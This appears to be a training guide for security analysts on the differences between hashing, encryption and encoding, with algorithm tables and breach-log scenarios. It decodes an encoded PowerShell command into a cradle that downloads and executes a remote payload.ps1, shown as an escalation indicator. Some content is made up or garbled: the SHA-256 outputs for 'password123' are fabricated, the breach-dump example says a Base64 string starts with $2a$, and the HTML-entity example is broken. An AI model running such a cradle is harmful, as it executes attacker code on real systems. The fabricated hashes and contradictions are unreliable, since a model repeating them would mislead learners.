Hashing vs Encryption vs Encoding

The Three Concepts — Hashing, Encryption, Encoding

These three concepts are the most commonly confused terms in security. Analysts who use them incorrectly lose credibility with engineering teams and make mistakes in investigations. Each serves a fundamentally different purpose:

Concept	Direction	Key Required?	Deterministic?	Reversible?	Purpose
Hashing	One-way	No	Yes (same input = same hash)	No (mathematically infeasible)	Integrity verification, password storage
Encryption	Two-way	Yes (symmetric or asymmetric)	No (salt, IV, or randomness)	Yes (with the key)	Confidentiality
Encoding	Both directions	No	Yes (always)	Yes (trivial — anyone can decode)	Data format transformation

The Critical Distinction

Hashing is a one-way mathematical function. You feed in data, you get a fixed-length digest. Given the digest, you cannot recover the original data (except by brute-forcing inputs and comparing). Example: password storage in /etc/shadow.

Encryption is a two-way function with a key. You feed in plaintext + key, you get ciphertext. Given the ciphertext + key, you recover the plaintext. Example: TLS, BitLocker, PGP.

Encoding is a format transformation. Base64, hex, and URL encoding change how data is represented. No secrecy is involved — encoding is not security. Analysts see encoded data (especially Base64) and mistake it for hash values or encrypted data. A Base64 string can be decoded in seconds with echo "cGFzc3dvcmQ=" | base64 -d.

Hashing — One-Way Integrity Verification

How Hashing Works

A hash function takes any input (a file, a password, a message) and produces a fixed-length output called a digest or hash value. The same input always produces the same output. Even a single bit change in the input produces a completely different hash (the avalanche effect).

Input: "password123"
SHA-256: ef92b778bafe771f8920b7f8c6c6a2b4e9f8c7a6b5d4e3f2a1b0c9d8e7f6a5b4

Input: "Password123"  (capital P)
SHA-256: a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f9a8b7c6d5e4f3a2b1c0d9e8f7a6

Common Hash Algorithms — Comparison

Algorithm	Digest Size	Security Status	Use Case
MD5	128 bits (32 hex chars)	Broken — collision attacks are trivial (2012 FLAME malware, 2017 forged certificates)	Legacy compatibility only. Do not use for security.
SHA-1	160 bits (40 hex chars)	Broken — SHAttered attack (2017) demonstrated practical collision	Deprecated. Avoid in all security contexts.
SHA-256	256 bits (64 hex chars)	Secure	The current standard. Password hashing (when combined with salt), file integrity, TLS certificates, blockchain.
SHA-512	512 bits (128 hex chars)	Secure	Stronger but slower. Useful when hash collisions must be absolutely prevented.
SHA-3	Variable (224/256/384/512)	Secure	Newest NIST standard. Different internal structure than SHA-2. Future-proofing.
bcrypt	Variable (depends on cost)	Secure	Designed for password hashing. Includes embedded salt and configurable work factor. Slower than SHA-256 (good for passwords).
scrypt	Variable	Secure	Password hashing designed to be memory-hard (resists GPU/ASIC cracking).
Argon2id	Variable	Secure (recommended by OWASP)	Winner of the 2015 Password Hashing Competition. Current best practice for password storage. Memory-hard, time-hard, parallelizable.

Password Hashing — The Right Way

When investigating a credential theft, the first question is: were the passwords properly hashed?

Bad (reversible or trivial):

$ echo "base64" && echo "cGFzc3dvcmQ=" | base64 -d
password

Base64 is not hashing. Scanning a breach dump for Base64 means the site stored passwords in plaintext.

Better but still wrong:

plaintext password → MD5 → 5f4dcc3b5aa765d61d8327deb882cf99

MD5 is fast. An attacker can compute ~10 billion MD5 hashes per second on a modern GPU. A RockYou wordlist cracks MD5 passwords in seconds.

Good:

plaintext password + unique salt + bcrypt → $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy

The $2a$ prefix identifies bcrypt. 10 is the cost factor (2^10 rounds). The salt is embedded in the output. Each password gets a different salt, so precomputed rainbow tables are useless.

Identifying Hash Types in Breach Data

When you see a hash in a breach report, identify the algorithm by format:

Format	Likely Algorithm	Length (hex chars)
`$1$salt$hash`	MD5-crypt (Unix)	Variable
$2a$ / $2b$ / $2y$	bcrypt	Variable (includes cost + salt)
$5$	SHA-256-crypt (Unix)	Variable
$6$	SHA-512-crypt (Unix)	Variable
`MD5:hash`	MD5 (OpenLDAP)	32 hex chars
`{SSHA}base64hash`	Salted SHA-1 (LDAP)	Variable (Base64)
32 hex characters	MD4 (NTLM), MD5, or MD2	32
40 hex characters	SHA-1	40
64 hex characters	SHA-256	64
`$argon2id$v=19$...`	Argon2id	Variable

Tools like hashid and hash-identifier can automatically detect hash types.

Encryption — Two-Way with a Key

Types of Encryption

Symmetric Encryption — Same key for encryption and decryption.

Algorithm	Key Size	Security	Use Case
AES-128	128 bits	Secure	Disk encryption (BitLocker, FileVault), TLS, Wi-Fi (WPA2). Fast, hardware-accelerated on modern CPUs.
AES-256	256 bits	Secure	Highest standard. Required for US government classified data (NSA Suite B). Slightly slower than AES-128.
ChaCha20	256 bits	Secure	Modern stream cipher. Preferred over AES on mobile devices (no hardware AES). Used in TLS 1.3, WireGuard, SSH.
DES	56 bits	Broken	56-bit keys can be brute-forced in < 24 hours. Do not use.
3DES	112 bits	Deprecated	Vulnerable to Sweet32 attack (2016). Do not use.
Blowfish	32-448 bits	Weak (block size)	64-bit block size makes it vulnerable to birthday attacks at ~32 GB data. Use AES instead.
Twofish	128-256 bits	Secure	AES finalist. Less common but still secure.

Asymmetric Encryption — Public/private key pair. Public key encrypts, private key decrypts.

Algorithm	Key Size	Security	Use Case
RSA	2048-4096 bits	Secure at 2048+	TLS certificates, PGP, SSH (legacy). Slow — typically used to encrypt symmetric keys.
ECC	256-521 bits	Secure	Modern alternative to RSA. Much smaller keys (256-bit ECC = 3072-bit RSA). Used in TLS 1.3, SSH (Ed25519), Bitcoin.
DSA	1024-3072 bits	Deprecated	Old NIST standard. Largely replaced by ECDSA.
Diffie-Hellman	2048+ bits	Secure (with proper groups)	Key exchange only — not encryption. Foundation of TLS key agreement.

Real-World Encryption Examples

TLS — Transport Layer Security

Client connects to https://
Server sends its RSA or ECDSA certificate (signed by a CA)
Client and server perform key exchange (ECDHE handshake)
Result: a symmetric AES-256 or ChaCha20 session key shared between client and server
All data encrypted for the duration of the session

Disk Encryption (BitLocker)

Writes: data encrypted with AES-128/256 before writing to disk
Reads: data decrypted from disk into memory
Key: TPM-protected or recovery key
Protects against: physical theft of the drive, cold boot attacks (partially), offline OS modification

PGP / Age

File encrypted with symmetric key, symmetric key encrypted with recipient’s public key
Only the recipient’s private key can decrypt the symmetric key, which decrypts the file
Real-world: secure file transfer, encrypted email, Git commit signing

Encoding — Just a Format Change

Encoding is not security. It is a transformation between data formats so that binary data can be transmitted over text-based protocols or displayed safely in various contexts.

Common Encoding Schemes

Scheme	Purpose	Example (output of “password”)
Base64	Binary → ASCII for safe transmission over text protocols	`cGFzc3dvcmQ=`
Hex	Binary → hexadecimal representation	`70617373776f7264`
URL encoding	Special characters in URLs	`passw%6Frd` (o → %6F)
HTML entities	Prevent HTML injection	`<script>` for `<script>`
Unicode escapes	Escaping special Unicode characters	`\u0070\u0061\u0073...`

What Analysts Commonly See

Base64 in logs: PowerShell commands are often Base64-encoded. -EncodedCommand followed by a Base64 string is an immediate escalation indicator.

powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=

Decode it:

echo 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=' | base64 -d | iconv -f UTF-16LE -t UTF-8

Result:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2/payload.ps1')

Hex in memory dumps: Memory forensics tools display strings in hex. A string 65 78 70 6C 6F 72 65 72 in a memory dump decodes to “explorer” — useful for identifying process names.

URL encoding in proxy logs: %68%74%74%70%73%3A%2F%2F decodes to https:// — useful for identifying obfuscated URLs in proxy logs.

Putting It All Together — Analysts’ Quick Reference

Scenario: You Find `JDJhJDEwJE5ROW5qOHVMT2lj...` in a Data Breach Dump

Check format. It starts with $2a$ → bcrypt hash. Good — password was properly hashed.
If it starts with cGFzc3dvcmQ= → Base64. Not hashed — the site stored plaintext credentials encoded as Base64. Immediate escalation.
If it starts with 5f4dcc3b5aa765d61d8327deb882cf99 (32 hex chars) → MD5 or NTLM. Weak — likely crackable, but at least the site stored a hash.

Scenario: You See an Encrypted Communication Log

Protocol: TLS 1.3 with TLS_AES_256_GCM_SHA384 → strong. No payload visibility, but that’s expected.
Protocol: TLS 1.0 with TLS_RSA_WITH_RC4_128_SHA → weak. Deprecated cipher suite needs remediation.
If you see the plaintext in the log alongside the ciphertext → logging at the wrong layer. The application decrypted before logging.

Active Directory Basics — covers the active directory basics concepts
AWS Misconfigurations — detection and response for T1525, T1613 techniques
Cloud Security Fundamentals — detection and response for T1525 techniques